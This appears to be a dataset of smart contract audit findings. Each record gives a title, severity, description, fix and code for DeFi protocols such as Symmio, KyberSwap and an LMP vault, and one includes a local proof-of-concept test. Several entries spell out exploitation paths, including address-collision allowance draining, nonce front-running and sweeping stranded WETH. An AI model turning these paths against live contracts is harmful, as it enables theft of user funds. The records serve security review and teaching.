⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc <aditya@gitcoin.co>, @0xKurt <kurt@gitcoin.co>, @codenamejason <jason@gitcoin.co>, @0xZakk <zakk@gitcoin.co>, @nfrgosselin <nate@gitcoin.co>\\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n
UUPSUpgradeable vulnerability in OpenZeppelin Contracts
medium
Openzeppelin has found the critical severity bug in UUPSUpgradeable. The kyber-swap contracts has used both openzeppelin contracts as well as openzeppelin upgrabable contracts with version v4.3.1. This is confirmed from package.json.\\n```\\nFile: ks-elastic-sc/package.json\\n\\n "@openzeppelin/contracts": "4.3.1",\\n "@openzeppelin/test-helpers": "0.5.6",\\n "@openzeppelin/contracts-upgradeable": "4.3.1",\\n```\\n\\nThe `UUPSUpgradeable` vulnerability has been found in openzeppelin version as follows,\\n@openzeppelin/contracts : Affected versions >= 4.1.0 < 4.3.2 @openzeppelin/contracts-upgradeable : >= 4.1.0 < 4.3.2\\nHowever, openzeppelin has fixed this issue in versions 4.3.2\\nOpenzeppelin bug acceptance and fix: check here\\nThe following contracts has been affected due to this vulnerability\\nPoolOracle.sol\\nTokenPositionDescriptor.sol\\nBoth of these contracts are UUPSUpgradeable and the issue must be fixed.
Update the openzeppelin library to latest version.\\nCheck this openzeppelin security advisory to initialize the UUPS implementation contracts.\\nCheck this openzeppelin UUPS documentation.
Upgradeable contracts using UUPSUpgradeable may be vulnerable to an attack affecting uninitialized implementation contracts.
```\\nFile: ks-elastic-sc/package.json\\n\\n "@openzeppelin/contracts": "4.3.1",\\n "@openzeppelin/test-helpers": "0.5.6",\\n "@openzeppelin/contracts-upgradeable": "4.3.1",\\n```\\n
Router.sol is vulnerable to address collission
medium
The pool address check in the the callback function isn't strict enough and can suffer issues with collision. Due to the truncated nature of the create2 opcode the collision resistance is already impaired to 2^160 as that is total number of possible hashes after truncation. Obviously if you are searching for a single hash, this is (basically) impossible. The issue here is that one does not need to search for a single address as the router never verifies that the pool actually exists. This is the crux of the problem, but first let's do a little math as to why this is a problem.\\n$$ 1 - e ^ {-k(k-1) \\over 2N } $$\\nWhere k is the number of hash values and N is the number of possible hashes\\nFor very large numbers we can further approximate the exponent to:\\n$$ -k^2 \\over 2N $$\\nThis exponent is now trivial to solve for an approximate attack value which is:\\n$$ k = \\sqrt{2N} $$\\nIn our scenario N is 2^160 (our truncated keccak256) which means that our approximate attack value is 2^80 since we need to generate two sets of hashes. The first set is to generate 2^80 public addresses and the second is to generate pool address from variations in the pool specifics(token0, token1, fee). Here we reach a final attack value of 2^81 hashes. Using the provided calculator we see that 2^81 hashes has an approximate 86.4% chance of a collision. Increase that number to 2^82 and the odds of collision becomes 99.96%. In this case, a collision between addresses means breaking this check and draining the allowances of all users to a specific token. This is because the EOA address will collide with the supposed pool address allowing it to bypass the msg.sender check. Now we considered the specific of the contract.\\nRouter.sol#L47-L51\\n```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n\\nThe above snippet from the swapCallback function is used to verify that msg.sender is the address of the pool.\\nRouter.sol#L224-L231\\n```\\nfunction _getPool(\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n) private view returns (IPool) {\\n return IPool(PoolAddress.computeAddress(factory, tokenA, tokenB, fee, poolInitHash));\\n}\\n```\\n\\nWe see that these lines never check with the factory that the pool exists or any of the inputs are valid in any way. token0 can be constant and we can achieve the variation in the hash by changing token1. The attacker could use token0 = WETH and vary token1. This would allow them to steal all allowances of WETH. Since allowances are forever until revoked, this could put hundreds of millions of dollars at risk.\\nAlthough this would require a large amount of compute it is already possible to break with current computing. Given the enormity of the value potentially at stake it would be a lucrative attack to anyone who could fund it. In less than a decade this would likely be a fairly easily attained amount of compute, nearly guaranteeing this attack.
Verify with the factory that msg.sender is a valid pool
Address collision can cause all allowances to be drained
```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n
Position value can fall below minimum acceptable quote value when partially closing positions requested to be closed in full
medium
In `LibQuote.closeQuote` there is a requirement to have the remaining quote value to not be less than minAcceptableQuoteValue:\\n```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n "LibQuote: Remaining quote value is low");\\n}\\n```\\n\\nNotice the condition when this require happens:\\n`LibQuote.quoteOpenAmount(quote)` is remaining open amount\\n`quote.quantityToClose` is requested amount to close\\nThis means that this check is ignored if partyA has requested to close amount equal to full remaining quote value, but enforced when it's not (even if closing fully). For example, a quote with opened amount = 100 is requested to be closed in full (amount = 100): this check is ignored. But PartyB can fill the request partially, for example fill 99 out of 100, and the remainder (1) is not checked to confirm to `minAcceptableQuoteValue`.\\nThe following execution paths are possible if PartyA has open position size = 100 and `minAcceptableQuoteValue` = 5:\\n`requestToClosePosition(99)` -> revert\\n`requestToClosePosition(100)` -> `fillCloseRequest(99)` -> pass (remaining quote = 1)
The condition should be to ignore the `minAcceptableQuoteValue` if request is filled in full (filledAmount == quantityToClose):\\n```\\n- if (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n+ if (filledAmount != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n "LibQuote: Remaining quote value is low");\\n }\\n```\\n
There can be multiple reasons why the protocol enforces `minAcceptableQuoteValue`, one of them might be the efficiency of the liquidation mechanism: when quote value is too small (and liquidation value too small too), liquidators will not have enough incentive to liquidate these positions in case they become insolvent. Both partyA and partyB might also not have enough incentive to close or respond to request to close such small positions, possibly resulting in a loss of funds and greater market risk for either user.\\nProof of Concept\\nAdd this to any test, for example to `ClosePosition.behavior.ts`.\\n```\\nit("Close position with remainder below minAcceptableQuoteValue", async function () {\\n const context: RunContext = this.context;\\n\\n this.user_allocated = decimal(1000);\\n this.hedger_allocated = decimal(1000);\\n\\n this.user = new User(this.context, this.context.signers.user);\\n await this.user.setup();\\n await this.user.setBalances(this.user_allocated, this.user_allocated, this.user_allocated);\\n\\n this.hedger = new Hedger(this.context, this.context.signers.hedger);\\n await this.hedger.setup();\\n await this.hedger.setBalances(this.hedger_allocated, this.hedger_allocated);\\n\\n await this.user.sendQuote(limitQuoteRequestBuilder()\\n .quantity(decimal(100))\\n .price(decimal(1))\\n .cva(decimal(10)).lf(decimal(5)).mm(decimal(15))\\n .build()\\n );\\n await this.hedger.lockQuote(1, 0, decimal(5, 17));\\n await this.hedger.openPosition(1, limitOpenRequestBuilder().filledAmount(decimal(100)).openPrice(decimal(1)).price(decimal(1)).build());\\n\\n // now try to close full position (100)\\n await this.user.requestToClosePosition(\\n 1,\\n limitCloseRequestBuilder().quantityToClose(decimal(100)).closePrice(decimal(1)).build(),\\n );\\n\\n // now partyA cancels request\\n //await this.user.requestToCancelCloseRequest(1);\\n\\n // partyB can fill 99\\n await this.hedger.fillCloseRequest(\\n 1,\\n limitFillCloseRequestBuilder()\\n .filledAmount(decimal(99))\\n .closedPrice(decimal(1))\\n .build(),\\n );\\n\\n var q = await context.viewFacet.getQuote(1);\\n console.log("quote quantity: " + q.quantity.div(decimal(1)) + " closed: " + q.closedAmount.div(decimal(1)));\\n\\n});\\n```\\n\\nConsole execution result:\\n```\\nquote quantity: 100 closed: 99\\n```\\n
```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n "LibQuote: Remaining quote value is low");\\n}\\n```\\n
MultiAccount `depositAndAllocateForAccount` function doesn't scale the allocated amount correctly, failing to allocate enough funds
medium
Internal accounting (allocatedBalances) are tracked as fixed numbers with 18 decimals, while collateral tokens can have different amount of decimals. This is correctly accounted for in AccountFacet.depositAndAllocate:\\n```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n\\nBut it is treated incorrectly in MultiAccount.depositAndAllocateForAccount:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n bytes memory _callData = abi.encodeWithSignature(\\n "allocate(uint256)",\\n amount\\n );\\n innerCall(account, _callData);\\n```\\n\\nThis leads to incorrect allocated amounts.
Scale amount correctly before allocating it:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n+ uint256 amountWith18Decimals = (amount * 1e18) /\\n+ (10 ** IERC20Metadata(collateral).decimals());\\n bytes memory _callData = abi.encodeWithSignature(\\n "allocate(uint256)",\\n- amount\\n+ amountWith18Decimals\\n );\\n innerCall(account, _callData);\\n```\\n
Similar to 222 from previous audit contest, the user expects to have full amount deposited and allocated, but ends up with only dust amount allocated, which can lead to unexpected liquidations (for example, user is at the edge of liquidation, calls depositAndAllocate to improve account health, but is liquidated instead). For consistency reasons, since this is almost identical to 222, it should also be high.
```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n
PartyBFacetImpl.chargeFundingRate should check whether quoteIds is empty array to prevent partyANonces from being increased, causing some operations of partyA to fail
medium
```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, "PartyBFacet: Length not match");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, "PartyBFacet: PartyA will be insolvent");\\n require(partyBAvailableBalance >= 0, "PartyBFacet: PartyB will be insolvent");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n\\nAs long as partyBAvailableBalance(L318) and partyAAvailableBalance(L323) are greater than or equal to 0, that is to say, PartyA and PartyB are solvent. Then, partyB can add 1 to `partyANonces[partyA]` at little cost which is the gas of tx.\\n```\\nFile: symmio-core\\contracts\\facets\\PartyA\\PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// rest of code// rest of code//assume codes here are executed\\n273:-> LibMuon.verifyPairUpnlAndPrice(upnlSig, quote.partyB, quote.partyA, quote.symbolId);\\n// rest of code// rest of code\\n }\\n```\\n\\nIf the current price goes against partyB, then partyB can front-run `forceClosePosition` and call `chargeFundingRate` to increase the nonces of both parties by 1. In this way, partyA's `forceClosePosition` will inevitably revert because the nonces are incorrect.
```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n317:- require(quoteIds.length == rates.length, "PartyBFacet: Length not match");\\n317:+ require(quoteIds.length > 0 && quoteIds.length == rates.length, "PartyBFacet: Length is 0 or Length not match");\\n```\\n
Due to this issue, partyB can increase nonces of any partyA with little cost, causing some operations of partyA to fail (refer to the Vulnerability Detail section). This opens up the opportunity for partyB to turn the table.
```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, "PartyBFacet: Length not match");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, "PartyBFacet: PartyA will be insolvent");\\n require(partyBAvailableBalance >= 0, "PartyBFacet: PartyB will be insolvent");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n
Stat calculator returns incorrect report for swETH
high
The purpose of the in-scope `SwEthEthOracle` contract is to act as a price oracle specifically for swETH (Swell ETH) per the comment in the contract below and the codebase's README\\n```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n\\nPer the codebase in the contest repository, the price oracle for the swETH is understood to be configured to the `SwEthEthOracle` contract at Line 252 below.\\n```\\nFile: RootOracleIntegrationTest.t.sol\\n swEthOracle = new SwEthEthOracle(systemRegistry, IswETH(SWETH_MAINNET));\\n..SNIP..\\n // Lst special pricing case setup\\n // priceOracle.registerMapping(SFRXETH_MAINNET, IPriceOracle(address(sfrxEthOracle)));\\n priceOracle.registerMapping(WSTETH_MAINNET, IPriceOracle(address(wstEthOracle)));\\n priceOracle.registerMapping(SWETH_MAINNET, IPriceOracle(address(swEthOracle)));\\n```\\n\\nThus, in the context of this audit, the price oracle for the swETH is mapped to the `SwEthEthOracle` contract.\\nBoth the swETH oracle and calculator use the same built-in `swEth.swETHToETHRate` function to retrieve the price of swETH in ETH.\\nLST Oracle Calculator Rebasing\\nswETH SwEthEthOracle - `swEth.swETHToETHRate()` SwethLSTCalculator - `IswETH(lstTokenAddress).swETHToETHRate()` False\\n```\\nFile: SwEthEthOracle.sol\\n /// @inheritdoc IPriceOracle\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n..SNIP..\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n\\n```\\nFile: SwethLSTCalculator.sol\\n function calculateEthPerToken() public view override returns (uint256) {\\n return IswETH(lstTokenAddress).swETHToETHRate();\\n }\\n```\\n\\nWithin the `LSTCalculatorBase.current` function, assume that the `swEth.swETHToETHRate` function returns $x$ when called. In this case, the `price` at Line 203 below and `backing` in Line 210 below will be set to $x$ since the `getPriceInEth` and `calculateEthPerToken` functions depend on the same `swEth.swETHToETHRate` function internally. Thus, `priceToBacking` will always be 1e18:\\n$$ \\begin{align} priceToBacking &= \\frac{price \\times 1e18}{backing} \\ &= \\frac{x \\times 1e18}{x} \\ &= 1e18 \\end{align} $$\\nSince `priceToBacking` is always 1e18, the `premium` will always be zero:\\n$$ \\begin{align} premium &= priceToBacking - 1e18 \\ &= 1e18 - 1e18 \\ &= 0 \\end{align} $$\\nAs a result, the calculator for swETH will always report the wrong statistic report for swETH. If there is a premium or discount, the calculator will wrongly report none.\\n```\\nFile: LSTCalculatorBase.sol\\n function current() external returns (LSTStatsData memory) {\\n..SNIP..\\n IRootPriceOracle pricer = systemRegistry.rootPriceOracle();\\n uint256 price = pricer.getPriceInEth(lstTokenAddress);\\n..SNIP..\\n uint256 backing = calculateEthPerToken();\\n // price is always 1e18 and backing is in eth, which is 1e18\\n priceToBacking = price * 1e18 / backing;\\n }\\n\\n // positive value is a premium; negative value is a discount\\n int256 premium = int256(priceToBacking) - 1e18;\\n\\n return LSTStatsData({\\n lastSnapshotTimestamp: lastSnapshotTimestamp,\\n baseApr: baseApr,\\n premium: premium,\\n slashingCosts: slashingCosts,\\n slashingTimestamps: slashingTimestamps\\n });\\n }\\n```\\n
When handling the swETH within the `LSTCalculatorBase.current` function, consider other methods of obtaining the fair market price of swETH that do not rely on the `swEth.swETHToETHRate` function such as external 3rd-party price oracle.
The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides inaccurate information, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.
```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n
Incorrect approach to tracking the PnL of a DV
high
Let $DV_A$ be a certain destination vault.\\nAssume that at $T0$, the current debt value (currentDvDebtValue) of $DV_A$ is 95 WETH, and the last debt value (updatedDebtBasis) is 100 WETH. Since the current debt value has become smaller than the last debt value, the vault is making a loss of 5 WETH since the last rebalancing, so $DV_A$ is sitting at a loss, and users can only burn a limited amount of DestinationVault_A's shares.\\nAssume that at $T1$, there is some slight rebalancing performed on $DV_A$, and a few additional LP tokens are deposited to it. Thus, its current debt value increased to 98 WETH. At the same time, the `destInfo.debtBasis` and `destInfo.ownedShares` will be updated to the current value.\\nImmediately after the rebalancing, $DV_A$ will not be considered sitting in a loss since the `currentDvDebtValue` and `updatedDebtBasis` should be equal now. As a result, users could now burn all the $DV_A$ shares of the LMPVault during withdrawal.\\n$DV_A$ suddenly becomes not sitting at a loss even though the fact is that it is still sitting at a loss of 5 WETH. The loss has been written off.\\n```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n
Consider a more sophisticated approach to track a DV's Profit and Loss (PnL).\\nIn our example, $DV_A$ should only be considered not making a loss if the price of the LP tokens starts to appreciate and cover the loss of 5 WETH.
A DV might be incorrectly marked as not sitting in a loss, thus allowing users to burn all the DV shares, locking in all the loss of the DV and the vault shareholders.
```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n
Price returned by Oracle is not verified
medium
As per the example provided by Tellor on how to integrate the Tellor oracle into the system, it has shown the need to check that the price returned by the oracle is not zero.\\n```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n\\nThus, the value returned from the `getDataBefore` function should be verified to ensure that the price returned by the oracle is not zero. However, this was not implemented.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n
Update the affected function as follows.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp // Remove the line below\\n 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n// Remove the line below\\n if (timestampRetrieved == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n// Add the line below\\n if (timestampRetrieved == 0 || value == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\n
The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIf an incorrect value of zero is returned from Tellor, affected assets within the protocol will be considered worthless.
```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n
ETH deposited by the user may be stolen.
high
In the `deposit` function, if the user pays with ETH, it will first call `_processEthIn` to wrap it and then call `pullToken` to transfer.\\n```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n\\n`_processEthIn` will wrap ETH into WETH, and these WETH belong to the contract itself.\\n```\\n function _processEthIn(ILMPVault vault) internal {\\n // if any eth sent, wrap it first\\n if (msg.value > 0) {\\n // if asset is not weth, revert\\n if (address(vault.asset()) != address(weth9)) {\\n revert InvalidAsset();\\n }\\n\\n // wrap eth\\n weth9.deposit{ value: msg.value }();\\n }\\n }\\n```\\n\\nHowever, `pullToken` transfers from `msg.sender` and does not use the WETH obtained in `_processEthIn`.\\n```\\n function pullToken(IERC20 token, uint256 amount, address recipient) public payable {\\n token.safeTransferFrom(msg.sender, recipient, amount);\\n }\\n```\\n\\nIf the user deposits 10 ETH and approves 10 WETH to the contract, when the deposit amount is 10, all of the user's 20 WETH will be transferred into the contract.\\nHowever, due to the `amount` being 10, only 10 WETH will be deposited into the vault, and the remaining 10 WETH can be stolen by the attacker using `sweepToken`.\\n```\\n function sweepToken(IERC20 token, uint256 amountMinimum, address recipient) public payable {\\n uint256 balanceToken = token.balanceOf(address(this));\\n if (balanceToken < amountMinimum) revert InsufficientToken();\\n\\n if (balanceToken > 0) {\\n token.safeTransfer(recipient, balanceToken);\\n }\\n }\\n```\\n\\nBoth `mint` and `deposit` in `LMPVaultRouterBase` have this problem.
Perform operations based on the size of `msg.value` and amount:\\nmsg.value == amount: transfer WETH from contract not `msg.sender`\\nmsg.value > amount: transfer WETH from contract not `msg.sender` and refund to `msg.sender`\\nmsg.value < amount: transfer WETH from contract and transfer remaining from `msg.sender`
ETH deposited by the user may be stolen.
